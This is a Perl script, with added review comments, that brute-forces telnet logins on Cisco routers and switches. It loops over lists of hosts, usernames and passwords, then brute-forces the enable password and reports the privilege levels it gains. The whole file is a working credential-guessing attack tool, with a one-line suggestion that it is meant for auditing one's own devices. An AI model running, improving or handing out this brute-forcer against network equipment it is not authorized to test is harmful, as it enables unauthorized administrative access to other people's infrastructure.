#!/usr/bin/perl

## fugi@bl.org 071703
## usage
## ./simple.pl > outfile 
## files user,pass,host holds lists for input
## NOTE leave the first line of user file blank for passwd only prompts
## 
## attempts telnet logins for ciscos whose IPs are provided
## will bruteforce with login:password or just password prompts
## if login is successful, will report priv level and brute enable password
## if enable is successful, will report priv level
## script is messy, however, functional. scripted for my personal use
## please communicate any changes or requests for changes to fugi@bl.org
## requires perl modules Net::Telnet::Cisco
## will loop logins even if a successful one is found so can report multiple successes
## why? because there may be many logins with many priv levels
## enable loop will end on success and report
## ios_break in code is necessary for some stupid ciscos
## do not email me asking questions of a degenerate nature
## if you can't figure out how to use it, I don't care
## be an orthogonal thinker and figure it out.
## I assume you will use it to audit your own ciscos, of course.



use Net::Telnet::Cisco;


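# Read one input list (one entry per line) from $path and return its lines
# with the trailing newline removed.  Dies with the OS error when the file
# cannot be opened; the previous unchecked two-argument open() silently
# produced an empty list, so a missing or misnamed file looked like a clean
# run that found nothing.
sub _read_list {
    my ($path) = @_;
    open(my $fh, '<', $path) or die "cannot open '$path': $!\n";
    my @lines = <$fh>;
    close $fh;
    chomp(@lines);
    return @lines;
}

# Input lists, read from the current working directory.  "pass" and "user"
# hold cleartext credentials and the script's output lists every pair that
# worked, so all of these files deserve restrictive permissions and should
# stay out of version control.
@pass = _read_list("pass");
@user = _read_list("user");
@host = _read_list("host");

# List sizes used as loop bounds.
$pnum=@pass;
$unum=@user;
$hnum=@host;

# Shared state (package globals, read and written by login() and enable()):
$goten=0;   # 1 once enable() has succeeded for the current host
$priv=0;    # privilege level reported after a successful enable
$lpriv=0;   # privilege level reported right after a successful login
$i=0;       # index into @pass for the login attempt
$x=0;       # index into @pass for the enable attempt
$u=0;       # index into @user
$h=0;       # index into @host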

########################
## Loop through hosts ##
########################

# Header row naming the colon-separated columns of each result line.
print "host:user:pass:priv:enable:priv\n";
# Outer loop: one iteration per entry of @host.  All loop indices are
# package globals because login() and enable() read them directly.
while($h < $hnum) {

############################
## Loop through usernames ##
############################

while($u < $unum) {

############################
## Loop through passwords ##
############################

while($i < $pnum) {
# login() takes no arguments; it reads $host[$h], $user[$u] and $pass[$i]
# and opens a new telnet session for this single attempt, i.e. one
# connection to the device per credential pair.
$good = login();
if($good) 
	{
		print "$host[$h]:$user[$u]:$pass[$i]"; 
		# $lpriv is filled in by login() when "show privilege" answered;
		# it is cleared after printing so it cannot leak into the next row.
		# If it is empty the priv column is simply omitted from the row.
		if($lpriv) {print ":$lpriv"; $lpriv=0; }
		# Only search for the enable password until one has been found
		# for this host ($goten is reset after the THERE label below).
		if($goten == 0) { 
			# enable() returns 1 before advancing $x, so $pass[$x] is the
			# candidate that was accepted.
			if(enable() == 1) { print ":$pass[$x]"; $goten=1;} 
			# $priv is set by enable() on success; either branch ends the row.
			if($priv) { print ":$priv\n"; $priv=0; }
			else { print "\n"; }
		}
		else { print "\n"; }
	}
# A hit with an empty username (the blank first line of the user file, used
# for password-only prompts) ends the work on this host: the jump leaves
# both inner loops and skips the remaining passwords and usernames.
if($good && $user[$u] eq '') { goto THERE; }

$i++;
} #end of pass loop

# Next username starts again from the first password; $x is reset as well,
# so a later enable() call for this host restarts its own search.
$i=0; $x=0;
$u++;
} #end of user loop
THERE:
# Per-host reset before moving on to the next target.
$goten=0;
$u=0; $i=0; $x=0;
$h++;
} #end host loop



######################
## Subroutine login ##
######################
 
# login: try a single username/password pair against the current host.
#
# Takes no arguments; the target and credentials come from the globals
# $host[$h], $user[$u] and $pass[$i].  Returns whatever
# Net::Telnet::Cisco's login() returned (true on success).
#
# Side effects: overwrites the globals $session, $ok, @lout, @lspl and
# $errm, and sets $lpriv when "show privilege" produced a usable answer.
#
# NOTE(review): the object returned by new() is used without a check; if
# new() hands back undef for an unreachable host, the login() call below
# would die -- confirm against the module's behaviour.
sub login {
    # A code-ref Errmode stores the error text in $errm instead of dying.
    $session = Net::Telnet::Cisco->new(
        Host    => $host[$h],
        Errmode => sub { $errm = shift },
    );
    $ok = $session->login($user[$u], $pass[$i]);

    if ($ok) {
        @lout = $session->cmd("show privilege");
        if (@lout && $lout[0] =~ /privilege/) {
            # The level is taken as the fifth space-separated field of the
            # first output line.
            @lspl  = split(/ /, $lout[0]);
            $lpriv = $lspl[4];
            chomp($lpriv);
        }
    }

    # Every attempt gets its own session, closed again whatever the result.
    $session->close;

    # login() is called without arguments, so @_ is empty and this resets
    # $errm to undef.
    $errm = shift;
    return $ok;
}

#######################
## Subroutine enable ##
#######################

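# enable: after a successful login, walk @pass looking for the enable
# password of the current host.
#
# Takes no arguments.  Logs in again with $user[$u]/$pass[$i] (the pair the
# caller just found to work) and then tries $pass[$x] for each $x up to
# $pnum.  $x is a global that the caller resets, so a later call resumes
# where the previous one stopped.
#
# Returns 1 on success, leaving $x at the accepted candidate and $priv set
# when "show privilege" answered; returns 0 when the list is exhausted.
#
# Fix over the original: the session is now closed before the successful
# return.  The close used to sit after "return 1" and never ran, which left
# a telnet session (and a vty line on the device) open for every success.
#
# NOTE(review): the prompt read from the device is interpolated into the
# "/.../" match string without escaping, so a prompt containing "/" or regex
# metacharacters changes the pattern -- consider quotemeta after confirming
# how waitfor() parses the string.
sub enable {
    # Errors are only counted here; $oops is inspected after each attempt.
    $session = Net::Telnet::Cisco->new(Host => $host[$h], Errmode => sub { $oops++; });
    $session->login($user[$u],$pass[$i]);
    $session->waitfor_pause(0);

    # Use the prompt seen after login as the pattern that tells us the
    # device is ready for the next attempt.
    $ptmp = $session->last_prompt;
    chomp($ptmp);
    $thing = "/$ptmp/";
    $found=0;

    while($x < $pnum) {
        # Per the header notes, ios_break is needed on some devices; the
        # empty command then provokes a fresh prompt to wait for.
        $session->ios_break;
        $session->cmd('');
        $found = $session->waitfor($thing);
        if($found) {
            # Clear the error counter so it reflects only this attempt.
            $oops=0;
            if( $session->enable($pass[$x]) ) {
                if($oops == 0) {

                    if((@out = $session->cmd("show privilege")) && ($out[0] =~ /privilege/) ) {
                        # Level is the fifth space-separated field.
                        @spl = split(/ /,$out[0]);
                        $priv = $spl[4];
                        chomp($priv);
                    }

                    # Close first: nothing after the return is executed.
                    $session->close;
                    return 1;
                }
                else { $oops = 0; }
            }
        }  ##### IF FOUND LOOP
        else { $session->ios_break; }
        $x++;
        # One-second pause between candidates.
        sleep 1;
        # enable() is called without arguments, so this resets $errm to undef.
        $errm = shift;
    }
    $session->close;
    return 0;
}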
